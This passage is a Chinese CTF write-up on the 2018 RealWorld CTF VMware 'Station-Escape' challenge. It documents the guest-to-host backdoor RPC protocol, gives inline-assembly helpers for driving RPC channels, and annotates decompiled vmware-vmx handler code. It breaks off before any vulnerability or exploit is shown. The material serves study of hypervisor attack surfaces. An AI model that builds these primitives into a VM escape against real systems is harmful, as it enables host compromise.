2018-RealWorld-Station-Escape

2021-05-28

字数统计: 6.9k字 | 阅读时长≈ 38分

2018年 RealWorld CTF的一道VMware逃逸题目，针对的攻击面是 VMware-vmx中的RPC机制，利用难度不是很高。

RPC机制

前置知识

在VMware中，有一个奇特的攻击面，就是 vmtools。vmtools帮助宿主机和客户机完成包括文件传输在内的一系列的通信和交互，其中使用了一种被称为 backdoor的接口。backdoor接口是如何和宿主机进行通信的呢。观察 backdoor函数的实现，可以发现如下代码：

MOV EAX, 564D5868h                      /* magic number     */
MOV EBX, command-specific-parameter
MOV CX,  backdoor-command-number
MOV DX,  5658h                          /* VMware I/O Port  */

IN  EAX, DX (or OUT DX, EAX)

首先需要明确的是，该接口在用户态就可以使用。在通常环境下，IN指令是一条特权指令，在普通用户态程序下是无法使用的。因此，运行这条指令会让用户态程序出错并陷出到 hypervisor层，从而 hypervisor层可以对客户机进行相关的操作和处理，因此利用此机制完成了通信。利用 backdoor的通信机制，客户机便可以使用 RPC进行一系列的操作，例如拖放、赋值、获取信息、发送信息等。

backdoor机制所有的命令和调用方法，基本都是首先设置寄存器、然后调用 IN或 OUT特权指令的模式。那么使用 backdoor传输 RPC指令需要经过哪些步骤呢。这里以 Real World CTF 2018 Finals Station-Escape Writeup该题目涉及到的 backdoor操作进行说明，主要参考这篇文档。

	 +------------------+
     | Open RPC channel |
     +---------+--------+
               |
  +------------v-----------+
  | Send RPC command length|
  +------------+-----------+
               |
  +------------v-----------+
  | Send RPC command data  |
  +------------+-----------+
               |
 +-------------v------------+
 | Recieve RPC reply length |
 +-------------+------------+
               |
  +------------v-----------+
  | Receive RPC reply data |
  +------------+-----------+
               |
+--------------v-------------+
| Finish receiving RPC reply |
+--------------+-------------+
               |
     +---------v---------+
     | Close RPC channel |
     +-------------------+

Open RPC channel

RPC subcommand: 00h

调用 IN(OUT)前，需要设置的寄存器内容：

EAX = 564D5868h - magic number
EBX = 49435052h - RPC open magic number ('RPCI')
ECX(HI) = 0000h - subcommand number
ECX(LO) = 001Eh - command number
EDX(LO) = 5658h - port number

返回值：

1 2	ECX = 00010000h: success / 00000000h: failure EDX(HI) = RPC channel number

该功能用于打开 RPC的 channel，其中 ECX会返回是否成功，EDX返回值会返回一个 channel的编号，在后续的 RPC通信中，将使用该编号。这里需要注意的是，在单个虚拟机中只能同时使用 8 个 channel(#0 - #7)，当尝试打开第9个 channel的时候，会检查其他 channel的打开时间，如果时间过了某一个值，会将超时的 channel关闭，再把这个 channel的编号返回。如果都没有超时，create channel会失败。

可以使用如下函数实现 Open RPC channel的过程：

void channel_open(int *cookie1,int *cookie2,int *channel_num,int *res){
	 asm("movl %%eax,%%ebx\n\t"
                "movq %%rdi,%%r10\n\t"
                "movq %%rsi,%%r11\n\t"
                "movq %%rdx,%%r12\n\t"
		"movq %%rcx,%%r13\n\t"
                "movl $0x564d5868,%%eax\n\t"
                "movl $0xc9435052,%%ebx\n\t"
                "movl $0x1e,%%ecx\n\t"
                "movl $0x5658,%%edx\n\t"
                "out %%eax,%%dx\n\t"
                "movl %%edi,(%%r10)\n\t"
                "movl %%esi,(%%r11)\n\t"
                "movl %%edx,(%%r12)\n\t"
		"movl %%ecx,(%%r13)\n\t"
		:
                :
                :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r8","%r10","%r11","%r12","%r13"
        );
}

Send RPC command length

RPC subcommand: 01h

调用：

EAX = 564D5868h - magic number
EBX = command length (not including the terminating NULL)
ECX(HI) = 0001h - subcommand number
ECX(LO) = 001Eh - command number
EDX(HI) = channel number
EDX(LO) = 5658h - port number

返回值：

1	ECX = 00810000h: success / 00000000h: failure

在发送 RPC command前，需要先发送 RPC command的长度，需要注意的是，此时我们输入的 channel number所指向的 channel必须出于已经 open的状态。ECX会返回是否成功发送，具体实现如下：

void channel_set_len(int cookie1,int cookie2,int channel_num,int len,int *res){
	asm("movl %%eax,%%ebx\n\t"
		"movq %%r8,%%r10\n\t"
                "movl %%ecx,%%ebx\n\t"
                "movl $0x564d5868,%%eax\n\t"
                "movl $0x0001001e,%%ecx\n\t"
                "movw $0x5658,%%dx\n\t"
                "out %%eax,%%dx\n\t"
                "movl %%ecx,(%%r10)\n\t"
                :
                :
        	:"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10"
	);
}

Send RPC command data

RPC subcommand：02h

调用：

EAX = 564D5868h - magic number
EBX = 4 bytes from the command data (the first byte in LSB)
ECX(HI) = 0002h - subcommand number
ECX(LO) = 001Eh - command number
EDX(HI) = channel number
EDX(LO) = 5658h - port number

返回值：

1	ECX = 000010000h: success / 00000000h: failure

该功能必须在 Send RPC command length后使用，每次只能发送 4 个字节，例如：如果要发送命令 machine.id.get，那么必须要调用 4 次，分别为：

EBX set to 6863616Dh ("mach")
EBX set to 2E656E69h ("ine.")
EBX set to 672E6469h ("id.g")
EBX set to 00007465h ("et\x00\x00")

ECX会返回是否成功，具体实现如下：

void channel_send_data(int cookie1,int cookie2,int channel_num,int len,char *data,int *res){
	asm("pushq %%rbp\n\t"
                "movq %%r9,%%r10\n\t"
		"movq %%r8,%%rbp\n\t"
		"movq %%rcx,%%r11\n\t"
		"movq $0,%%r12\n\t"
		"1:\n\t"
		"movq %%r8,%%rbp\n\t"
		"add %%r12,%%rbp\n\t"
		"movl (%%rbp),%%ebx\n\t"
                "movl $0x564d5868,%%eax\n\t"
                "movl $0x0002001e,%%ecx\n\t"
		"movw $0x5658,%%dx\n\t"
                "out %%eax,%%dx\n\t"
		"addq $4,%%r12\n\t"
		"cmpq %%r12,%%r11\n\t"
		"ja 1b\n\t"
		"movl %%ecx,(%%r10)\n\t"
		"popq %%rbp\n\t"
                :
                :
                :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10","%r11","%r12"
        );
}

Recieve RPC reply length

RPC subcommand：03h

调用：

EAX = 564D5868h - magic number
ECX(HI) = 0003h - subcommand number
ECX(LO) = 001Eh - command number
EDX(HI) = channel number
EDX(LO) = 5658h - port number

返回值：

1 2	EBX = reply length (not including the terminating NULL) ECX = 00830000h: success / 00000000h: failure

接收 RPC reply的长度。需要注意的是所有的 RPC command都会返回至少2个字节的 reply的数据，其中 1表示 success，0表示 failure，即使 VMware无法识别 RPC command，也会返回 0 Unknown command作为 reply。也就说，reply数据的前两个字节始终表示 RPC command命令的状态。

void channel_recv_reply_len(int cookie1,int cookie2,int channel_num,int *len,int *res){
	asm("movl %%eax,%%ebx\n\t"
                "movq %%r8,%%r10\n\t"
                "movq %%rcx,%%r11\n\t"
                "movl $0x564d5868,%%eax\n\t"
                "movl $0x0003001e,%%ecx\n\t"
                "movw $0x5658,%%dx\n\t"
                "out %%eax,%%dx\n\t"
                "movl %%ecx,(%%r10)\n\t"
		"movl %%ebx,(%%r11)\n\t"
                :
                :
                :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10","%r11"
        );
		
}

Receive RPC reply data

RPC subcommand：04h

调用：

EAX = 564D5868h - magic number
EBX = reply type from subcommand 03h
ECX(HI) = 0004h - subcommand number
ECX(LO) = 001Eh - command number
EDX(HI) = channel number
EDX(LO) = 5658h - port number

1 2	EBX = 4 bytes from the reply data (the first byte in LSB) ECX = 00010000h: success / 00000000h: failure

在实际的逆向分析中，EBX中存放的值，不是 reply id，而是 reply type，他决定了执行的路径。和发送的数据一样，每次只能够接受4个字节的数据。需要注意的是，在 Recieve RPC reply length中提到过，应答数据的前两个字节始终表示 RPC command的状态。举例说明，如果我们使用 RPC command询问 machine.id.get，如果成功的话，会返回 1 <virtual machine id>，否则为 0 No machine id。

EAX = 564D5868h - magic number
EBX = reply type from subcommand 03h
ECX(HI) = 0004h - subcommand number
ECX(LO) = 001Eh - command number
EDX(HI) = channel number
EDX(LO) = 5658h - port number
    
void channel_recv_data(int cookie1,int cookie2,int channel_num,int offset,char *data,int *res){
	asm("pushq %%rbp\n\t"
                "movq %%r9,%%r10\n\t"
                "movq %%r8,%%rbp\n\t"
                "movq %%rcx,%%r11\n\t"
                "movq $1,%%rbx\n\t"
		"movl $0x564d5868,%%eax\n\t"
                "movl $0x0004001e,%%ecx\n\t"
                "movw $0x5658,%%dx\n\t"
                "in %%dx,%%eax\n\t"
		"add %%r11,%%rbp\n\t"
                "movl %%ebx,(%%rbp)\n\t"
                "movl %%ecx,(%%r10)\n\t"
                "popq %%rbp\n\t"
                :
                :
                :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10","%r11","%r12"
        );
}

Finish receiving RPC reply

RPC subcommand：05h

调用：

EAX = 564D5868h - magic number
EBX = reply type from subcommand 03h
ECX(HI) = 0005h - subcommand number
ECX(LO) = 001Eh - command number
EDX(HI) = channel number
EDX(LO) = 5658h - port number

1	ECX = 00010000h: success / 00000000h: failure

和前文所述一样，在 EBX中存储的是 reply type。在接受完 reply的数据后，调用此命令。如果没有通过 Receive RPC reply data接受完整个reply数据的话，就会返回 failure。

EAX = 564D5868h - magic number
EBX = reply type from subcommand 03h
ECX(HI) = 0005h - subcommand number
ECX(LO) = 001Eh - command number
EDX(HI) = channel number
EDX(LO) = 5658h - port number
    
void channel_recv_finish(int cookie1,int cookie2,int channel_num,int *res){
	asm("movl %%eax,%%ebx\n\t"
                "movq %%rcx,%%r10\n\t"
		"movq $0x1,%%rbx\n\t"
                "movl $0x564d5868,%%eax\n\t"
                "movl $0x0005001e,%%ecx\n\t"
                "movw $0x5658,%%dx\n\t"
                "out %%eax,%%dx\n\t"
                "movl %%ecx,(%%r10)\n\t"
                :
                :
                :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10"
        );
}

Close RPC channel

RPC subcommand：06h

调用：

EAX = 564D5868h - magic number
ECX(HI) = 0006h - subcommand number
ECX(LO) = 001Eh - command number
EDX(HI) = channel number
EDX(LO) = 5658h - port number

1	ECX = 00010000h: success / 00000000h: failure

关闭 channel：

void channel_close(int cookie1,int cookie2,int channel_num,int *res){
	asm("movl %%eax,%%ebx\n\t"
                "movq %%rcx,%%r10\n\t"
                "movl $0x564d5868,%%eax\n\t"
                "movl $0x0006001e,%%ecx\n\t"
                "movw $0x5658,%%dx\n\t"
                "out %%eax,%%dx\n\t"
                "movl %%ecx,(%%r10)\n\t"
                :
                :
                :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10"
        );
}

VMware-vmx分析

结构体分析

00000000 channel         struc ; (sizeof=0x59, mappedto_361)
00000000 state           dd ?
00000004 protocol_num    dd ?
00000008 field_8         dd ?
0000000C field_C         dd ?
00000010 virtual_time    dq ?
00000018 cmd_len         dd ?
0000001C cmd_remain      dd ?
00000020 cmd             dq ?
00000028 size            dd ?
0000002C reply_size      dd ?
00000030 reply_remain    dq ?
00000038 out_msg_buf     dq ?
00000040 finish_recv     dq ?
00000048 type_struct     dq ?
00000050 flag            db ?
00000051 cookie1         dq ?
00000059 channel         ends

程序分析

__int64 __fastcall sub_189310(__int64 a1, __int64 a2)
{
  int sub_command; // ebx
  unsigned __int64 v3; // rsi
  channel *channel51; // rax
  int v5; // ecx
  int v6; // er8
  int v7; // er9
  channel *channel; // rbx
  unsigned __int64 cmd_buf_ptr; // rdx
  const char *v10; // rdi
  __int64 v11; // rdx
  int v12; // er8
  int v13; // er9
  unsigned int v14; // ebp
  void (__fastcall *finish_recv_func)(__int64, _QWORD, _QWORD); // r12
  char reply_type; // al
  channel *channel61; // rax
  int v18; // ecx
  int v19; // er8
  int v20; // er9
  channel *channel6; // rbx
  int protocol_num; // ebp
  int RPCI_OPEN_NUM; // eax
  int v25; // ecx
  int v26; // er8
  int v27; // er9
  char *protocollist; // rdx
  int RPC_NUM; // eax
  channel *channel11; // rax
  __int64 v31; // rdi
  int cmd_data; // ebp
  channel *channel21; // rax
  unsigned int cmd_remain_num; // eax
  int cmd_new_remain_num; // eax
  __int64 v36; // rax
  char v37; // al
  __int64 v38; // rax
  channel *channel31; // rax
  __int64 v40; // rdx
  __int64 v41; // rax
  channel *channel41; // rax
  unsigned int reply_remain_num; // edx
  unsigned __int16 *out_msg_ptr; // rax
  int reply_remain_num_after; // eax
  int v46; // eax
  int v47; // edx
  int v48; // ecx
  int v49; // er8
  int v50; // er9
  unsigned int v51; // eax
  _DWORD *channel_struct_list_addr; // rdx
  unsigned int close_channel_num2; // er15
  __int64 v54; // r14
  int v55; // edx
  int v56; // ecx
  int v57; // er8
  int v58; // er9
  int v59; // eax
  __int64 channel_addr1; // r8
  int close_channel_num; // ecx
  int v62; // edx
  __int64 *virtual_time_off; // rsi
  __int64 virtual_time_lim; // rax
  __int64 v65; // rax
  void *cmd_buf; // rdi
  char cmd_res; // al
  __int64 v68; // rdx
  unsigned int command_length; // eax
  int v70; // ecx
  int v71; // er8
  int v72; // er9
  int command_length1; // ebp
  unsigned int cmd_length; // er12
  __int64 virtualtime; // rax
  int v76; // esi
  __int64 channel_id; // r14
  __int64 v78; // rax
  __int64 addr_offset; // r12
  char *cookie1; // rsi
  int v81; // edx
  int v82; // ecx
  int v83; // er8
  int v84; // er9
  channel *channel_struct; // rdx
  unsigned __int8 (__fastcall *v86)(_QWORD, _QWORD); // rdx
  int v87; // edx
  int v88; // ecx
  int v89; // er8
  int v90; // er9
  __int64 v91; // rdi
  __int64 v92; // rsi
  __int64 v93; // rdx
  void *cmd_new_buf; // rax
  int v95; // ecx
  int v96; // er8
  int v97; // er9

  sub_command = (int)get_argument(1) >> 16;     // 获取ECX高位，sub_command
  switch ( sub_command )
  {
    case 0:                                     // Open RPC Channel
      protocol_num = 0;
      RPCI_OPEN_NUM = get_argument(3);          // 获取EBX
      protocollist = protocol_list;
      RPC_NUM = RPCI_OPEN_NUM & 0x7FFFFFFF;     // 跳出执行完整open操作
      break;
    case 1:                                     // 发送命令长度
      v3 = 7LL;
      channel11 = get_channel(6, 7);
      channel = channel11;
      if ( !channel11 )
        goto LABEL_62;
      LODWORD(cmd_buf_ptr) = channel11->state;
      if ( channel11->state != 1 )
        goto LABEL_20;
      cmd_buf = &dword_0 + 3;
      command_length = get_argument(3);         // 获取EBX
      command_length1 = command_length;
      if ( byte_FE9584 )
      {
        if ( command_length == -1 )
        {
          Errout(
            (unsigned int)"GuestMsg: Channel %u, message size limit exceeded.\n",
            (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5)),
            v68,
            v70,
            v71,
            v72);
          LODWORD(v3) = 0;
          goto LABEL_12;
        }
      }
      else if ( command_length > 0x10000 )
      {
        Errout(
          (unsigned int)"GuestMsg: Channel %u, Message is larger than %u bytes. Denial of service attack?\n",
          (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5)),
          0x10000,
          v70,
          v71,
          v72);
        LODWORD(v3) = 0;
        goto LABEL_12;
      }
      cmd_length = command_length + 1;
      if ( command_length + 1 > channel->size )
      {
        cmd_buf = (void *)channel->cmd;
        v3 = cmd_length;
        cmd_new_buf = realloc(cmd_buf, cmd_length);// 为后续命令申请缓存空间
        if ( !cmd_new_buf )
        {
          Errout(
            (unsigned int)"GuestMsg: Channel %u, Not enough memory to receive a message\n",
            (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5)),
            v68,
            v95,
            v96,
            v97);
          LODWORD(v3) = 0;
          goto LABEL_12;
        }
        channel->cmd = (__int64)cmd_new_buf;    // 更新channel中的cmd_buf
        channel->size = cmd_length;             // 更新channel中的cmd_length
      }
      channel->cmd_remain = command_length1;    // 输入输出缓冲区中的剩余数据长度
      channel->cmd_len = command_length1;       // 输入输出缓冲区长度
      if ( command_length1 )                    // command_length为空
      {
        channel->state = 2;
      }
      else
      {
        *(_BYTE *)channel->cmd = 0;
        v65 = (__int64)channel->protocol_num << 6;
        v3 = (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5));
        cmd_buf = *(void **)((char *)&unk_FE95C0 + v65);
        cmd_res = (*(__int64 (__fastcall **)(void *, unsigned __int64, __int64, _QWORD))((char *)&unk_FE95B0
                                                                                       + v65
                                                                                       + 8))(// 执行相关函数
                    cmd_buf,
                    v3,
                    channel->cmd,
                    (unsigned int)channel->cmd_len);
        channel->state = 1;
        if ( !cmd_res )                         // 执行出错，直接返回
          goto LABEL_62;
      }
      virtualtime = ((__int64 (__fastcall *)(void *, unsigned __int64, __int64))VmTime_ReadVirtualTime)(
                      cmd_buf,
                      v3,
                      v68);
      v76 = (unsigned __int16)dword_FE9580;
      channel->virtual_time = virtualtime;      // 更新有效时间
      LODWORD(v3) = (v76 | 1) << 16;            // 设置返回状态返回值
      goto LABEL_12;
    case 2:                                     // 发送命令
      v3 = 7LL;
      v31 = 6LL;
      cmd_data = get_argument(3);               // 接受命令，每次接受4字节
      channel21 = get_channel(6, 7);
      channel = channel21;
      if ( !channel21 )
        goto LABEL_62;                          // channel不存在退出
      LODWORD(cmd_buf_ptr) = channel21->state;
      if ( channel21->state != 2 )
        goto LABEL_20;                          // channel状态不对，报错
      if ( LOBYTE(channel21->field_8) == 1 )
        goto LABEL_48;                          // 返回状态1
      cmd_remain_num = channel21->cmd_remain;
      cmd_buf_ptr = channel->cmd + (unsigned int)channel->cmd_len - (unsigned __int64)cmd_remain_num;
      if ( cmd_remain_num == 2 )                // 根据缓冲区剩余长度进入不同的接受流程
      {
        *(_WORD *)cmd_buf_ptr = cmd_data;
        cmd_new_remain_num = channel->cmd_remain - 2;
        channel->cmd_remain = cmd_new_remain_num;
      }
      else if ( cmd_remain_num == 3 )
      {
        *(_BYTE *)cmd_buf_ptr = cmd_data;
        *(_BYTE *)(cmd_buf_ptr + 2) = BYTE2(cmd_data);// cmd_buf赋值为cmd_data数据
        *(_BYTE *)(cmd_buf_ptr + 1) = BYTE1(cmd_data);
        cmd_new_remain_num = channel->cmd_remain - 3;
        channel->cmd_remain = cmd_new_remain_num;
      }
      else
      {
        if ( cmd_remain_num == 1 )
        {
          *(_BYTE *)cmd_buf_ptr = cmd_data;
          cmd_new_remain_num = channel->cmd_remain - 1;
        }
        else
        {
          *(_DWORD *)cmd_buf_ptr = cmd_data;
          cmd_new_remain_num = channel->cmd_remain - 4;// 每次最多4字节
        }
        channel->cmd_remain = cmd_new_remain_num;
      }
      if ( cmd_new_remain_num )
        goto LABEL_31;
      *(_BYTE *)(channel->cmd + (unsigned int)channel->cmd_len) = 0;// cmd末尾加0
      v36 = (__int64)channel->protocol_num << 6;
      v3 = (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5));
      v31 = *(_QWORD *)((char *)&unk_FE95C0 + v36);
      v37 = (*(__int64 (__fastcall **)(__int64, unsigned __int64, __int64, _QWORD))((char *)&unk_FE95B0
                                                                                  + v36
                                                                                  + 8))(// 执行相应处理函数
              v31,
              v3,
              channel->cmd,
              (unsigned int)channel->cmd_len);
      channel->state = 1;
      if ( v37 )
        goto LABEL_31;
LABEL_62:
      LODWORD(v3) = 0;
      goto LABEL_12;
    case 3:                                     // 发送返回数据长度
      v3 = 7LL;
      v31 = 6LL;
      channel31 = get_channel(6, 7);
      channel = channel31;
      if ( !channel31 )
        goto LABEL_62;
      cmd_buf_ptr = (unsigned int)channel31->state;
      if ( (_DWORD)cmd_buf_ptr != 1 )
        goto LABEL_20;
      if ( !channel31->out_msg_buf )            // 输出缓冲区不存在报错
        goto LABEL_31;
      ret_value(2, 0x10000);                    // 返回reply_id edx 高位存储 0x1
      v3 = (unsigned int)channel->reply_size;
      ret_value(3, v3);                         // 返回返回数据长度，ebx存储
      channel->state = 4 - (LODWORD(channel->reply_remain) != 0);
      v41 = ((__int64 (__fastcall *)(__int64, unsigned __int64, __int64))VmTime_ReadVirtualTime)(3LL, v3, v40);
      LODWORD(v3) = (unsigned __int16)dword_FE9580;
      channel->virtual_time = v41;
      LODWORD(v3) = ((unsigned int)v3 | 3) << 16;// 计算ecx返回状态信息
      goto LABEL_12;
    case 4:                                     // 接受返回数据
      channel41 = get_channel(6, 7);
      channel = channel41;
      if ( !channel41 )
        goto LABEL_62;
      LODWORD(cmd_buf_ptr) = channel41->state;
      if ( channel41->state != 3 )
        goto LABEL_20;
      if ( LOBYTE(channel41->field_8) == 1 )    // 状态不对，返回
        goto LABEL_48;
      if ( !channel41->out_msg_buf )
        goto LABEL_89;
      if ( (get_argument(3) & 1) == 0 )         // 获取replt_type，&1 比较
        goto LABEL_80;
      ret_value(2, 0x20000);                    // 返回reply_id edx高位存储0x2
      reply_remain_num = channel->reply_remain;
      out_msg_ptr = (unsigned __int16 *)(channel->out_msg_buf
                                       + (unsigned int)channel->reply_size
                                       - (unsigned __int64)reply_remain_num);
      if ( reply_remain_num == 2 )
      {
        v31 = 3LL;
        v3 = *out_msg_ptr;
        ret_value(3, v3);                       // 返回4字节数据，ebx存储
        reply_remain_num_after = LODWORD(channel->reply_remain) - 2;
        LODWORD(channel->reply_remain) = reply_remain_num_after;
      }
      else if ( reply_remain_num == 3 )
      {
        v31 = 3LL;
        v3 = *(unsigned __int8 *)out_msg_ptr | (*((unsigned __int8 *)out_msg_ptr + 2) << 16) | (*((unsigned __int8 *)out_msg_ptr
                                                                                                + 1) << 8);
        ret_value(3, v3);
        reply_remain_num_after = LODWORD(channel->reply_remain) - 3;
        LODWORD(channel->reply_remain) = reply_remain_num_after;
      }
      else
      {
        if ( reply_remain_num == 1 )
        {
          v3 = *(unsigned __int8 *)out_msg_ptr;
          v31 = 3LL;
          ret_value(3, v3);
          reply_remain_num_after = LODWORD(channel->reply_remain) - 1;
        }
        else
        {
          v3 = *(unsigned int *)out_msg_ptr;
          v31 = 3LL;
          ret_value(3, v3);
          reply_remain_num_after = LODWORD(channel->reply_remain) - 4;
        }
        LODWORD(channel->reply_remain) = reply_remain_num_after;
      }
      if ( !reply_remain_num_after )            // 返回数据被全部接受完毕
        channel->state = 4;
LABEL_31:
      v38 = ((__int64 (__fastcall *)(__int64, unsigned __int64, unsigned __int64))VmTime_ReadVirtualTime)(
              v31,
              v3,
              cmd_buf_ptr);
      LODWORD(v3) = 0x10000;                    // 设置返回状态
      channel->virtual_time = v38;
      goto LABEL_12;
    case 5:                                     // case 5：结束接受返回流程
      v3 = 7LL;
      channel51 = get_channel(6, 7);
      channel = channel51;
      if ( !channel51 )
        goto LABEL_62;
      LODWORD(cmd_buf_ptr) = channel51->state;
      if ( channel51->state == 4 )              // 只有全部接受完毕返回数据
                                                // 才可以进行如下流程
      {
        if ( LOBYTE(channel51->field_8) == 1 )
        {
LABEL_48:
          channel->state = 1;
          LOBYTE(channel->field_8) = 0;
          v3 = (unsigned __int64)sub_100000;
        }
        else if ( channel51->out_msg_buf )      // 输出缓冲区是否存在
        {
          v10 = (_BYTE *)(&dword_0 + 3);
          if ( (get_argument(3) & 1) != 0 )     // get ebx reply_type，&1 比较
          {
            v14 = (unsigned __int16)(0xAAAB * (((char *)channel - (char *)&channel_struct_list) >> 5));
          }
          else
          {
LABEL_80:
            v10 = "GuestMsg: Channel %u, Unable to send a message\n";
            v14 = (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5));
            v3 = (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5));
            Errout(
              (unsigned int)"GuestMsg: Channel %u, Unable to send a message\n",
              v3,
              v11,
              (char *)channel - (char *)&channel_struct_list,
              v12,
              v13);
          }
          channel->state = 1;
          channel->virtual_time = ((__int64 (__fastcall *)(const char *, unsigned __int64, __int64))VmTime_ReadVirtualTime)(
                                    v10,
                                    v3,
                                    v11);
          set_disactive(0, v14);
          finish_recv_func = (void (__fastcall *)(__int64, _QWORD, _QWORD))channel->finish_recv;
          reply_type = get_argument(3);
          finish_recv_func(channel->type_struct, v14, reply_type & 0x21);
          LODWORD(v3) = 0x10000;
        }
        else
        {
LABEL_89:
          Errout(
            (unsigned int)"GuestMsg: Channel %u, Protocol error, out msg not present.\n",
            (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5)),
            cmd_buf_ptr,
            v5,
            v6,
            v7);
          LODWORD(v3) = 0;
        }
      }
      else
      {                                         // 未全部接收完毕，报错
LABEL_20:
        Errout(
          (unsigned int)"GuestMsg: Channel %u, Protocol error, state: %u\n",
          (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5)),
          cmd_buf_ptr,
          v5,
          v6,
          v7);
        LODWORD(v3) = 0;
      }
LABEL_12:
      ret_value(1, v3);                         // 设置ecx，作为返回状态
      return 0LL;
    case 6:                                     // 关闭channel
      channel61 = get_channel(6, 7);
      channel6 = channel61;
      if ( !channel61 )
        goto LABEL_62;
      if ( channel61->state )
      {
        close_exctiem_channel(-21845 * (((char *)channel61 - (char *)&channel_struct_list) >> 5), 4u);
        (*((void (__fastcall **)(_QWORD, _QWORD, _QWORD))&unk_FE95C0 + 8 * (__int64)channel6->protocol_num + 1))(
          *((_QWORD *)&unk_FE95D0 + 8 * (__int64)channel6->protocol_num),
          (unsigned __int16)(-21845 * (((char *)channel6 - (char *)&channel_struct_list) >> 5)),
          0LL);
        LODWORD(v3) = 0x10000;
      }
      else
      {
        Errout(
          (unsigned int)"GuestMsg: Cannot close channel %u: it is not opened\n",
          (unsigned __int16)(-21845 * (((char *)channel61 - (char *)&channel_struct_list) >> 5)),
          0,
          v18,
          v19,
          v20);
        LODWORD(v3) = 0;
      }
      goto LABEL_12;
    default:
      v46 = get_argument(1);
      Errout((unsigned int)"GuestMsg: Unknown basic request type %u\n", v46 >> 16, v47, v48, v49, v50);
      return 0xFFFFFFFFLL;
  }
  while ( *protocollist != 1 || RPC_NUM != *((_DWORD *)protocollist + 1) )// 检查是不是符合RPC magicnumber
  {
    ++protocol_num;
    protocollist += 64;
    if ( protocol_num == 3 )
    {
      Errout((unsigned int)"GuestMsg: Unknown protocol magic number.\n", a2, (_DWORD)protocollist, v25, v26, v27);
      goto LABEL_17;
    }
  }
  v51 = 0;
  channel_struct_list_addr = &channel_struct_list;
  do                                            // 循环遍历查找为空的channel_struct结构体
  {
    close_channel_num2 = v51;
    if ( !*channel_struct_list_addr )           // 找到为空
    {
      channel_id = (int)v51;
      goto LABEL_72;
    }
    ++v51;
    channel_struct_list_addr += 0x18;
  }
  while ( v51 != 8 );                           // 若没有找到空闲的channel
                                                // 需要寻找是否有到期的channel
  v54 = ((__int64 (__fastcall *)(__int64, __int64, _DWORD *))VmTime_ReadVirtualTime)(3LL, a2, channel_struct_list_addr);
  v59 = sub_16A3E0(30, (unsigned int)"guest_msg.channel.in.timeout", v55, v56, v57, v58);
  close_channel_num = 8;
  v62 = 0;
  virtual_time_off = (__int64 *)&virtual_time_list;
  virtual_time_lim = v54 - 1000000LL * v59;
  do
  {
    if ( virtual_time_lim > *virtual_time_off ) // 找到超过virtual_time_lim的channel
                                                // 就会返回进行释放
    {
      if ( (_WORD)close_channel_num == 8 )
      {
        close_channel_num = v62;
      }
      else
      {
        channel_addr1 = 96LL * (unsigned __int16)close_channel_num;
        if ( *virtual_time_off < *(_QWORD *)((char *)&virtual_time_list + channel_addr1) )// 遍历每个channel_virtualtime
          close_channel_num = v62;
      }
    }
    ++v62;
    virtual_time_off += 12;
  }
  while ( (_WORD)v62 != 8 );
  if ( (_WORD)close_channel_num == 8 )          // 未找到超时的channel
  {
    Errout(
      (unsigned int)"GuestMsg: Too many channels opened.\n",
      (_DWORD)virtual_time_off,
      v62,
      close_channel_num,
      channel_addr1,
      (unsigned int)&virtual_time_list);
    goto LABEL_17;
  }
  close_channel_num2 = (unsigned __int16)close_channel_num;// 找到超时的channel
  channel_id = (unsigned __int16)close_channel_num;
  close_exctiem_channel(close_channel_num, 68u);// 关闭超时的channel
  v78 = (__int64)*((int *)&channel_struct_list + 24 * channel_id + 1) << 6;
  (*(void (__fastcall **)(_QWORD, _QWORD, __int64))((char *)&unk_FE95C0 + v78 + 8))(
    *(_QWORD *)((char *)&unk_FE95D0 + v78),
    close_channel_num2,
    2LL);
LABEL_72:                                       // 设置channel参数
  addr_offset = 0x60 * channel_id;              // 计算channel offset
  cookie1 = (char *)&channel_struct_list + 0x60 * channel_id + 0x51;
  if ( (unsigned __int8)set_randnum(8uLL, cookie1) )// 用随机数设置cookie
  {
    channel_flag_list[0x60 * channel_id] = (int)get_argument(3) < 0;// 判断magic_number是否小于0
                                                // 存储在channel[0x50]处
    channel_struct = (channel *)((char *)&channel_struct_list + addr_offset);
    channel_struct->protocol_num = protocol_num;// 设置protocol_num
    LOBYTE(channel_struct->field_8) = 0;
    channel_struct->state = 1;
    set_disactive(0, close_channel_num2);
    v86 = *(unsigned __int8 (__fastcall **)(_QWORD, _QWORD))&protocol_list[64// 获取open_channel函数
                                                                         * (__int64)*(int *)((char *)&channel_struct_list
                                                                                           + addr_offset
                                                                                           + 4)
                                                                         + 8];
    if ( v86
      && !v86(
            *((_QWORD *)&unk_FE95B0 + 8
                                    * (__int64)*(int *)((char *)&channel_struct_list + addr_offset + 4)),
            close_channel_num2) )               // 执行open_channel函数
    {
      Errout((unsigned int)"GuestMsg: Protocol denied channel open.\n", close_channel_num2, v87, v88, v89, v90);
      close_exctiem_channel(close_channel_num2, 4u);
    }
    else
    {
      v91 = 2LL;
      v92 = close_channel_num2 << 16;
      ret_value(2, v92);                        // 设置返回参数 edx为channel_id
      if ( channel_flag_list[0x60 * channel_id] )
      {
        ret_value(6, *(_DWORD *)((char *)&channel_struct_list + 0x60 * channel_id + 81));// 设置第6个参数为cookie
        v91 = 7LL;
        v92 = *((unsigned int *)&unk_FE9661 + 0x18 * channel_id + 0x15);
        ret_value(7, v92);                      // 设置返回参数7
      }
      sub_command = 0x10000;
      *((_QWORD *)&virtual_time_list + 12 * channel_id) = ((__int64 (__fastcall *)(__int64, __int64, __int64))VmTime_ReadVirtualTime)(// 设置channel有效时间
                                                            v91,
                                                            v92,
